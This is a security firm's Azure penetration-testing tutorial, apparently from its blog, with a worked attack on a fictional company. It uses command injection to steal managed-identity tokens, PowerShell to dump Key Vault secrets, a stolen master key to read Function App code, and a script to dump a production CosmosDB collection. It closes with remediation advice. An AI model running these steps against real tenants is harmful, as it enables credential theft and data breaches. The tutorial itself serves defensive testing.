Like other cloud services, Azure is a prime target for attackers. This is due to its growing popularity and strategic importance for businesses.

To reduce the risk of security breaches, it is essential to implement robust security measures. It is also important to understand the types of attack and assess their potential impact.

There are several ways of assessing the security of an Azure infrastructure. In this article, we present the ‘offensive’ approach, which we believe to be the most effective: Azure cloud penetration testing (or Azure pentesting). We detail the principles and objectives, as well as the methodology for an Azure audit through a concrete use case.

Comprehensive Guide to Azure Pentesting

What is Azure Penetration Testing?

An Azure penetration test aims to assess the security of services and resources hosted in an Azure cloud environment.

This type of audit simulates cyber attacks to identify exploitable weaknesses in the infrastructure and configurations of Azure resources, such as virtual machines, databases, web applications and containers.

The aim is to discover potential vulnerabilities, measure their impact and propose corrective measures to strengthen the security of the target system.

Scope of an Azure Penetration Test

The scope of an Azure penetration test can be adapted to suit the specific needs of your organisation.

It is possible to test all the services and configurations of your Azure infrastructure or to focus on the most critical elements.

The tests can cover, among other things (non-exhaustive list):

- Virtual machines: identification of poorly secured services, out-of-date software or configuration errors.

- Databases: unauthorised access, poor permissions management, data leaks, etc.

- Storage services: exposure of sensitive data, poor access management, file share configurations, etc.

- Identity and access management: analysis of roles and permissions, broken access control, etc.

- Hosted web applications and APIs: application vulnerabilities inherent in this type of system (injections, RCE, etc.).

Azure Penetration Testing Methodology

To present the methodology of an Azure penetration test, let’s put ourselves in the shoes of an attacker seeking to compromise the company ‘VaadataLab’.

We will begin by presenting the Azure tools, techniques and concepts that can be used to gather information and compromise critical business data, by exploiting configuration weaknesses in Azure.

We will then examine the measures that VaadataLab could have implemented to protect itself.

Reconnaissance and discovery of the Azure infrastructure

For all types of offensive audit, the reconnaissance phase is essential. The aim is to gain a better understanding of the target infrastructure.

As part of an Azure penetration test, this involves determining which Azure services are being used (App services, Key Vault, CosmosDB, etc.).

In Azure, each service has its own domain. For example, as soon as a web app is created, an associated domain of the form <subdomain>.azurewebsites.net is also created.

Tools such as MicroBurst (specific to Azure) or Cloud Enum (multi-cloud) facilitate this reconnaissance. These tools use dictionaries and apply permutation rules to find services that may belong to the target company.



In our example, we will use the MicroBurst tool with the following command:

Invoke-EnumerateAzureSubDomains -Base vaadatalab -Permutations .\permutations.txt

The -Base argument defines the keyword on which the permutations are performed in order to discover Azure resources. The -Permutations argument points to the wordlist used to build those permutations.

Here we discover that VaadataLab has:

- 3 web apps or ‘Function Apps’: ‘staging-vaadatalab’, ‘vaadatalabprod’ and ‘vaadatalab’.

- 3 Continuous Deployment Services (SCM) for application deployment.

- 1 Storage Account: ‘vaadatalabprod8a07’.

NB: an Azure Storage Account contains all the Azure Storage objects: blobs, files, queues and tables. In addition, the source code of Function Apps can be stored in a Storage Account.
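The permutation approach used by these tools can be sketched in a few lines of Python. This is only an illustration of the idea, not a reimplementation of MicroBurst or Cloud Enum: the list of DNS suffixes is a small assumed subset, and the prefix/suffix rules and function names are hypothetical choices made for this example.

```python
import socket

# Assumed subset of Azure service DNS suffixes; real tools check many more.
AZURE_SUFFIXES = {
    "App Services": "azurewebsites.net",
    "App Services (SCM)": "scm.azurewebsites.net",
    "Storage Accounts (blob)": "blob.core.windows.net",
    "Key Vaults": "vault.azure.net",
}


def candidate_names(base, permutations):
    """Return the base keyword plus prefix/suffix permutations, de-duplicated."""
    names = [base]
    for word in permutations:
        names += [f"{word}{base}", f"{base}{word}", f"{word}-{base}", f"{base}-{word}"]
    # dict.fromkeys keeps the first occurrence and preserves order
    return list(dict.fromkeys(names))


def candidate_hosts(base, permutations):
    """Yield (service, hostname) pairs to be checked through DNS."""
    for name in candidate_names(base, permutations):
        for service, suffix in AZURE_SUFFIXES.items():
            yield service, f"{name}.{suffix}"


def resolves(hostname):
    """Return True if the hostname has a DNS record."""
    try:
        socket.gethostbyname(hostname)
        return True
    except OSError:
        return False
```

Calling `candidate_hosts("vaadatalab", ["staging", "prod"])` and keeping only the hostnames for which `resolves` returns True gives a list of services that probably exist. Whether they really belong to the target still has to be confirmed manually.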

The reconnaissance phase can go even further. For example, the tenant ID of a domain can be retrieved, as well as the list of domain names associated with a tenant, extending the reconnaissance to these domains. It is also possible to check the existence of an email address. This can be used, for example, to run phishing campaigns.

We won’t dwell on these points in this article.

Exploiting a command injection on an app

We now have a clearer view of VaadataLab’s Azure infrastructure.

To compromise this infrastructure from web applications, we first need to identify a vulnerability that allows arbitrary commands to be executed or files to be read on the underlying system.

The aim is to recover secrets that can be used to compromise a ‘Service Principal’. This represents the identity of the resource in the tenant.

There are two ways of authenticating with a Service Principal from a compromised application. The first is to find an ‘identifier:secret’ pair in a configuration file. The second involves sending an HTTP request to the MSI_ENDPOINT using IDENTITY_HEADER as the secret.

MSI_ENDPOINT is the environment variable that holds the URL at which the ‘Managed identities’ service is exposed. This service provides applications with an identity that is automatically managed in Microsoft Entra ID. With this identity, applications can obtain Microsoft Entra tokens without having to manage credentials. Both MSI_ENDPOINT and IDENTITY_HEADER are usually available in the server’s environment variables.
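As a rough sketch of the second method, the request can be built in Python from the two environment variables. The api-version value and the `secret` header name are taken from the curl command used later in this article. The function names are hypothetical, and the `access_token` field read from the response is an assumption about the JSON returned by the service.

```python
import json
import urllib.parse
import urllib.request


def build_token_request(env, resource):
    """Build the managed identity token request for the given resource.

    `env` is a mapping of environment variables (for example os.environ).
    """
    query = urllib.parse.urlencode({"resource": resource, "api-version": "2017-09-01"})
    url = f"{env['MSI_ENDPOINT']}?{query}"
    # The value of IDENTITY_HEADER is sent as the `secret` header
    return urllib.request.Request(url, headers={"secret": env["IDENTITY_HEADER"]})


def fetch_access_token(env, resource):
    """Send the request and return the token (only works on the target host)."""
    with urllib.request.urlopen(build_token_request(env, resource)) as response:
        # Assumption: the JSON body exposes the JWT under "access_token"
        return json.load(response)["access_token"]
```

The endpoint is generally only reachable from the application host itself, which is why an attacker needs command execution on the application before this request is of any use.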

Auditing hosted applications

Let’s take a closer look at the 3 web applications discovered during the reconnaissance phase.



They look very similar, and we seem to be dealing with an application from a company specialising in the sale of plastic ducks.

Based on our experience, we will tackle the ‘staging-vaadatalab’ application first. Staging environments should generally not be exposed on the Internet: they are development environments, and are often more vulnerable than production.

From here, we follow the methodology used in web penetration testing to discover and exploit vulnerabilities.



By chance, the fuzzing carried out on the staging environment uncovered a file called ‘test’, which looks promising.



Command injection exploitation

Injection tests on a form on the website revealed a command injection vulnerability. This allowed us to execute commands on the underlying system.

The first step is to retrieve the environment variables. The commands in this section use POSIX shell syntax ($VAR); on a Windows host, the cmd equivalent is %VAR%. The two variables we need can be displayed with the following command:

echo $MSI_ENDPOINT $IDENTITY_HEADER

We now have everything we need to compromise the application’s Service Principal.

To do this, we simply need to run the following command on the underlying system:

curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"

This command sends an HTTP request to the ‘managed identities’ service and retrieves a JWT associated with the application’s Service Principal.

We can then use this JWT and the privileges associated with the account to move laterally in the Azure infrastructure.
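Before using the token, it can be useful to check what it contains. The sketch below decodes the payload of a JWT without verifying its signature, which is enough for inspection purposes. The function name is hypothetical, and the claims mentioned afterwards are those we would typically expect in a Microsoft Entra access token, not something shown in this scenario.

```python
import base64
import json


def decode_jwt_claims(token):
    """Return the claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a JWT with three dot-separated parts")
    payload = parts[1]
    # base64url payloads omit padding; restore it before decoding
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
```

Claims such as `aud` (the resource the token is valid for) and `oid` (the object ID of the identity) help confirm which Service Principal has been compromised and which API the token can be used against.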

Retrieving the secrets of the Key Vault



Let’s start by listing the resources accessible by our application’s Service Principal, using the following PowerShell code:

# Connect with the compromised web app account

$access_token = "<access_token_management>"

Connect-AzAccount -AccessToken $access_token -AccountId 02861316-6d42-4d55-b2f7-542af2fb9915

# List the resources this identity can read

Get-AzResource

We can see that we have access to a Key Vault named ‘keyvaultvaadatalab1’.

A Key Vault is a service for centralising and storing passwords, connection strings, certificates, secret keys and so on. It also simplifies the management of application secrets and allows integration with other Azure services.

So it’s a safe bet that sensitive information is stored in this Key Vault. But having access to a resource does not mean that you can do everything with it. Azure (like other cloud services) offers a high level of granularity in terms of the permissions that can be given to one resource over another.



We therefore need to list the permissions we have on the Key Vault. This can be done using the following PowerShell code:

$access_token = "<access_token_management>"

Connect-AzAccount -AccessToken $access_token -AccountId 02861316-6d42-4d55-b2f7-542af2fb9915

$KeyVault = Get-AzKeyVault

$Token = (Get-AzAccessToken).Token

$SubscriptionID = (Get-AzSubscription).Id

$ResourceGroupName = $KeyVault.ResourceGroupName

$KeyVaultName = $KeyVault.VaultName

$URI = "https://management.azure.com/subscriptions/$SubscriptionID/resourceGroups/$ResourceGroupName/providers/Microsoft.KeyVault/vaults/$KeyVaultName/providers/Microsoft.Authorization/permissions?api-version=2022-04-01"

$RequestParams = @{

Method = 'GET'

Uri = $URI

Headers = @{

'Authorization' = "Bearer $Token"

}

}

(Invoke-RestMethod @RequestParams).value

This script queries the Azure Management REST API to retrieve the privileges that the ‘staging-vaadatalab’ application has on the ‘keyvaultvaadatalab1’ Key Vault.

Azure Key Vault permissions are generally defined in terms of actions on the resource itself and actions on the data it contains.

Actions

Actions define the operations that the client is authorised to perform on a resource.

In our case, the action specified is Microsoft.KeyVault/vaults/read, which means that the user has the right to read the metadata of an Azure Key Vault. This generally includes operations such as retrieving information about the vault (name, location, tags, etc.).

DataActions

DataActions are actions specific to the data in the key vault. They define the operations authorised on the secrets and keys stored in the key vault. In this example, 4 dataActions are defined:

- Microsoft.KeyVault/vaults/keys/read: allows the metadata of keys stored in the vault to be read.

- Microsoft.KeyVault/vaults/keys/decrypt/action: allows the keys stored in the vault to be used for decryption.

- Microsoft.KeyVault/vaults/secrets/readMetadata/action: allows the metadata of secrets stored in the key vault to be read.

- Microsoft.KeyVault/vaults/secrets/getSecret/action: authorises the recovery of secret values stored in the key vault.
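To make the distinction between actions and dataActions more concrete, here is a small Python sketch that checks whether a given operation is granted by a permissions response. It assumes that each entry of the response exposes `actions`, `notActions`, `dataActions` and `notDataActions` lists, and that `*` acts as a wildcard. The function names are hypothetical.

```python
from fnmatch import fnmatchcase


def _matches(operation, patterns):
    """Case-insensitive wildcard match of an operation against patterns."""
    op = operation.lower()
    return any(fnmatchcase(op, pattern.lower()) for pattern in patterns)


def is_allowed(permissions, operation, data_plane=False):
    """Return True if any permission entry grants `operation`.

    `permissions` is the list returned under `value` by the
    Microsoft.Authorization/permissions endpoint queried above.
    """
    if data_plane:
        allow_key, deny_key = "dataActions", "notDataActions"
    else:
        allow_key, deny_key = "actions", "notActions"
    for entry in permissions:
        granted = _matches(operation, entry.get(allow_key, []))
        excluded = _matches(operation, entry.get(deny_key, []))
        if granted and not excluded:
            return True
    return False
```

With the permissions listed above, `is_allowed(perms, "Microsoft.KeyVault/vaults/secrets/getSecret/action", data_plane=True)` would return True, which is the signal that secret values can be read.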

Retrieving the secrets

The getSecret dataAction will allow us to retrieve the value of all the secrets in the Key Vault and analyse what we can do with them.

But first, we need to retrieve another specific access_token to perform actions on the data in the Key Vault.

To do this, we again exploit the command injection on the application to retrieve an access_token with the following command:

curl "<MSI_ENDPOINT>?resource=https://vault.azure.net&api-version=2017-09-01" -H "secret:<IDENTITY_HEADER>"

We can now list all the secrets in the Key Vault using the following PowerShell script:

# List all secrets in the keyvault

$access_token = "<access_token_management>"

$keyvault_access_token = "<access_token_keyvault>"

Connect-AzAccount -AccessToken $access_token -KeyVaultAccessToken $keyvault_access_token -AccountId 3329fea7-642e-4c09-b1ad-d8edbe140267

$KeyVault = Get-AzKeyVault

$SubscriptionID = (Get-AzSubscription).Id

$ResourceGroupName = $KeyVault.ResourceGroupName

$KeyVaultName = $KeyVault.VaultName

$secrets = Get-AzKeyVaultSecret -VaultName $keyVaultName

foreach ($secret in $secrets) {

$secretName = $secret.Name

$secretValue = (Get-AzKeyVaultSecret -VaultName $keyVaultName -Name $secretName -AsPlainText)

Write-Output "$secretName : $secretValue"



} Reading the Function App source code

One of the secrets is called host-masterkey-master. This is very reminiscent of the ‘master key’ of a Function App.

Azure Functions is a serverless solution that allows less infrastructure to be managed and saves on costs. Instead of worrying about deploying and maintaining servers, Azure provides all the up-to-date resources needed to keep applications running.

Each Function App has a masterkey that enables administrative actions to be performed, such as reading the source code of the Function App, adding code, and so on.



We can therefore test this masterkey on the ‘vaadatalabprod’ Function App discovered during the reconnaissance phase in order to access the source code of the various functions.

To do this, we can query the Function App’s virtual file system (VFS) via the endpoint https://<function-app>.azurewebsites.net/admin/vfs/home/site/wwwroot/.

The following PowerShell code is used to perform this action:

$URL = "https://vaadatalabprod.azurewebsites.net/admin/vfs/home/site/wwwroot/"

$Params = @{

"URI" = $URL

"Method" = "GET"

"Headers" = @{

"Content-Type" = "application/octet-stream"

"x-functions-key" = "<master-key>"

}

}

Invoke-RestMethod @Params -UseBasicParsing

The result is the list of functions, which means that the masterkey is indeed that of the ‘vaadatalabprod’ Function App.
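The listing returned by the VFS endpoint can then be sorted into directories and files. The sketch below assumes that the response is a JSON array of entries with a `name` field and a `mime` field, and that directories are flagged with the MIME type `inode/directory`. This format is an assumption and should be checked against the actual response. The function name is hypothetical.

```python
def split_listing(listing):
    """Split a VFS directory listing into (directories, files) name lists."""
    directories, files = [], []
    for entry in listing:
        # Assumption: directories are flagged with the MIME type below
        if entry.get("mime") == "inode/directory":
            directories.append(entry["name"])
        else:
            files.append(entry["name"])
    return sorted(directories), sorted(files)
```

Each function usually lives in its own directory under wwwroot, so the directory names give a first list of candidates to explore with further VFS requests.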

Now it’s time to read the source code of the functions, looking for secrets for example.
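Searching the retrieved source code for secrets can be partly automated. The following sketch looks for two kinds of strings with regular expressions. The patterns and names are illustrative assumptions chosen for this example; dedicated secret scanners use far more complete rule sets.

```python
import re

# Illustrative patterns only; real secret scanners ship far larger rule sets.
SECRET_PATTERNS = {
    "MongoDB connection string": re.compile(r"mongodb(?:\+srv)?://[^\s\"']+"),
    "Storage account key": re.compile(r"AccountKey=[A-Za-z0-9+/=]{20,}"),
}


def find_secrets(source):
    """Return (label, line number, match) for each suspicious string."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append((label, number, match.group(0)))
    return findings
```

Running `find_secrets` on the content of each file downloaded through the VFS endpoint gives a quick first pass. A manual review remains necessary, since secrets do not always follow a recognisable pattern.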

At this stage, it is also possible to add a function that contains arbitrary code. This can be used to drop code that retrieves an access_token in order to compromise the Service Principal of the ‘vaadatalabprod’ Function App, and then to repeat the analysis of the resources accessible by the Function App to potentially compromise other resources.

Compromising the database

Let’s take a closer look at the ManageDuckOrdersProd function, which appears to be dedicated to production.

In fact, the __init__.py file in the ManageDuckOrdersProd function contains a secret for accessing the CosmosDB production database.

Alongside its relational database services, Azure offers CosmosDB, a NoSQL database managed entirely by Azure.

The __init__.py file contains a connection string that gives access to the MongoDB database at vaadatalab1-server.mongo.cosmos.azure.com.

With this connection string, we can access all the production data contained in the CosmosDB.



The following simple Python script can be used to retrieve all the data:

from pymongo import MongoClient

connection_string = "<connection_string>"

db_name = "vaadatalab1-cosmosdb"

collection_name = "Production"

client = MongoClient(connection_string)

db = client[db_name]

collection = db[collection_name]

documents = collection.find()

for doc in documents:

    print(doc)

client.close()

Fixing and preventing vulnerabilities and malicious exploits on Azure

It’s now time to look at the steps VaadataLab could have taken to avoid such a scenario.

The reconnaissance phase revealed that the staging environment was exposed on the Internet, although such environments should not be publicly accessible. VaadataLab could limit access to the staging environment by restricting the IP addresses allowed to reach it.

In addition, installing a WAF would make it more difficult to exploit vulnerabilities. However, the security of the application should not rely solely on the WAF.

Let’s now look at the Azure infrastructure. In our scenario, the staging environment had read access to all the secrets in the ‘keyvaultvaadatalab1’ Key Vault, including the masterkey for the production Function App.

The principle of least privilege must apply. The question to ask is: ‘Does my staging application really need access to the masterkey of the production Function App?’ The answer is probably no.

It is therefore essential to limit the staging application’s access to what is strictly necessary. Azure even recommends using one Key Vault per application, per environment and per region.

It is also possible to restrict access to Function Apps and Key Vault. It is unlikely that it will be necessary to expose a Key Vault on the Internet. Azure makes it possible to restrict access to Key Vault to specific IP addresses or to use virtual network service endpoints to restrict access to a defined virtual network.
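The logic behind an IP-based restriction is a simple default-deny allowlist. The sketch below illustrates it in Python with the standard `ipaddress` module. It does not configure anything in Azure, and the function name and the address ranges used in the example are hypothetical.

```python
import ipaddress


def is_source_allowed(source_ip, allowed_ranges):
    """Return True only if the source IP falls inside an allowed CIDR range."""
    address = ipaddress.ip_address(source_ip)
    # Anything that does not match an explicit range is rejected
    return any(address in ipaddress.ip_network(cidr) for cidr in allowed_ranges)
```

For example, with `allowed_ranges = ["203.0.113.0/24"]` (a documentation range standing in for an office network), a request coming from 198.51.100.7 would be rejected.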

Finally, it is not advisable to leave hard-coded secrets in the code of an application. We recommend storing the connection string in a Key Vault rather than leaving it in the Function App.
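As a minimal sketch of this recommendation, the function code can read the connection string from an application setting instead of embedding it. This assumes the setting is populated by the platform, for example through a Key Vault reference, and that an unresolved reference is exposed as its literal `@Microsoft.KeyVault(...)` string. The setting name COSMOS_CONNECTION_STRING and the function name are hypothetical.

```python
import os


def get_connection_string(env=os.environ, name="COSMOS_CONNECTION_STRING"):
    """Read the connection string from the environment instead of the code."""
    value = env.get(name)
    if not value:
        raise RuntimeError(f"{name} is not set")
    if value.startswith("@Microsoft.KeyVault("):
        # Assumption: an unresolved reference is passed through as-is
        raise RuntimeError(f"{name} is an unresolved Key Vault reference")
    return value
```

With this approach, reading the source code of the function through the VFS endpoint no longer reveals the secret. Anyone able to execute code in the Function App can still read it, so least privilege remains essential.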

Perform an Azure Penetration Test with Vaadata, a Company Specialised in Offensive Security

It is important to assess the level of resistance of your Azure infrastructure to the attacks described in this article.

This assessment can be carried out using one of the audits we offer. Whether black-box, grey-box or white-box, we can identify all the vulnerabilities in your Azure infrastructure and help you fix them.